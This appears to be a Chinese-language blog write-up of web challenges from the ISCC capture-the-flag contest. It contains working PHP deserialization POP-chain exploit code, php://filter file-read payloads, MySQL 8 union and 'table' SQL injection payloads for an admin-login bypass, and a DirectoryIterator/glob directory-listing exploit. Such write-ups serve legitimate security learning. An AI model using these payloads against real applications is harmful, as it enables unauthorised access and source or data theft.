ISCC web题复现

ISCC web题复现

前言

第一次参加ISCC线上赛,感觉题目质量还是挺好的,擂台赛都是大佬们的主场,向我这样的小白也只能学学新东西。在此总结做过的web题目以及相关知识点。

冬奥会

这是一道典型的代码审计。代码中需要满足Step1和Step2都为true。

看代码主体部分

ISCC web题复现

这里需要绕过三处,第一处is_numeric函数通过字符绕过。

第二处array_search函数,被搜索的数组中有0时,它会返回int(0)从而绕过该函数。

第三处is_array函数,在下标一的位置设置一个数组,从而达到该函数的要求。同时item要满足三个元素。

ISCC web题复现

最终payload:

?Information={"year":"hahh","items":[0,[1],"haha"]}

ISCC web题复现

从而得出flag。在这个题目中我觉得关键点就是这个array_search函数的一个绕过吧。

Pop2022

这题刚开始可以直接访问flag.php,之后就修复了,

这是一个反序列化构造pop链的题目,先看题目代码,有一个include函数,存在文件包含

ISCC web题复现

采用php伪协议读取源码:php://filter/convert.base64-encode/resource=index.php

尾部是append函数调用,首部是Road_is_Long中的__construct魔术方法,大致pop链是

Road_is_Long->page=new Road_is_Long()->string=Make_a_Change()->effort=Try_Work_Hard()

构造exp:

<?php
class Road_is_Long{
	public $page;
    public $string;
}
class Try_Work_Hard{
	protected  $var='php://filter/convert.base64-encode/resource=flag.php';
}
class Make_a_Change{
	public $effort;
}
$a = new Road_is_Long();
$b = new Try_Work_Hard();
$c = new Make_a_Change();
$d = new Road_is_Long();
$a->page=$d;
$d->string=$c;
$c->effort=$b;
echo urlencode(serialize($a));
?>

有protect修饰的属性,在序列化时有不可见字符,所以我们要url编码。 将运行结果打进去,然后base64解码就能得出flag。

ISCC web题复现

其实这个题跟之前有个题很相似,中规中矩的一个pop链的构造,我觉得以往构造这种链子先找到tostring魔术方法是比较重要的。

Easy-SQL

题目提醒传id参数,测试几组没有回显,用sleep函数发现是时间盲注。同时也发现select被过滤了。 在查询id=8的时候,可以看见email表。

ISCC web题复现

用sqlmap爆出了数据库和版本号。数据库没什么作用,mysql8.0版本有新特性。

ISCC web题复现
 新特性:select * from user相当于table user。从而可以绕过select查询到表。我们爆出emalis表,  payload:

id=-1 union table emails limit 7,1 # (检索第八行)

可以发现一个zip压缩包,通过url访问压缩包,并下载。发现是index.php的源码。对源码进行代码审计。

ISCC web题复现

得到flag需要满足两个条件,让username===admin,和让select查询出来的passwd与POST传参的passwd值相同。

该表有三个字段,id,username,passwd。select查询后返回的passwd值与post传参的passwd值都是可控的,所以可以构造payload:

username=0' union select 1,'admin',3#&passwd=3

admin是要加引号,不然会被当作字符串处理。当然也可以十六进制绕过。抓包改post发包得flag

ISCC web题复现

我觉得这个题的关键的点就是mysql8.0的新特性的一个绕过,还有就是在代码审计中的union创建虚拟表的相关内容。

爱国敬业好青年-2

题目中国让我们找出好青年所处城市的经纬度。在青年1题目中出现过北京天安门,百度搜索北京天安门的经纬度,查的是东经116°23′北纬39°54′。根据要求格式提交。

ISCC web题复现

得出假的flag。f12查看源码,可以得出数据是post传参,参数分别为lati和langti。action为flag。

ISCC web题复现
 

所以我们这么传参 ,就得出了flag。

ISCC web题复现

 这一题就是看前端代码还有稍微大的脑洞。

findme

出现一张图片查看源代码发现unser.php,访问这个php文件出现一大堆代码。

ISCC web题复现

最下面有unserialize函数,说明要考反序列化。用data参数post方式传递数据。

题目中有hint.php,大概是有提示的,我们想办法读取这个文件。这里有三个判断,我们可以用php伪协议来读取hint.php,让un2赋值为php://filter/convert.base64-encode/resource=正好可以拼接后面的hint.php。

构造的exp很简单就不说了,打进去得一串base64,解码得到提示。

ISCC web题复现

 提示有两点,flag放在以f开头的txt文件中,该txt文件放在当前web目录下。

接着我们可以执行命令查看,但是没有回显,行不通。审计代码可以发现Givemeanew()函数是去实例化一个类,类是我们可控的,并且yigei()函数将这个类的执行结果打印出来,那我们就用原生类的反序列化。 我们可以用DirectoryIterator的一个内置类进行目录遍历。

将un0赋值为DirectoryIterator,这是一个php内置类,配合glob伪协议可以用来读取目录,我们已经知道这个txt文件放在/var/www/html目录下,所以构造exp:

<?php
class a{
    public $un0="DirectoryIterator";
    public $un1="glob:///var/www/html/f*.txt";
    public $un2;
    public $un3="unserialize";
    public $un4; 
}
$flag = new a();
echo serialize($flag);
?>

找到txt文件,访问这个文件得到flag。

ISCC web题复现

这道题就是考察了个简单的利用原生类去遍历目录,算是比较基础的原生类反序列化了。

结语

剩下的web题,如果条件允许还会尽力复现。

                       

点击阅读全文

上一篇 2023年 6月 12日 am10:36
下一篇 2023年 6月 12日 am10:37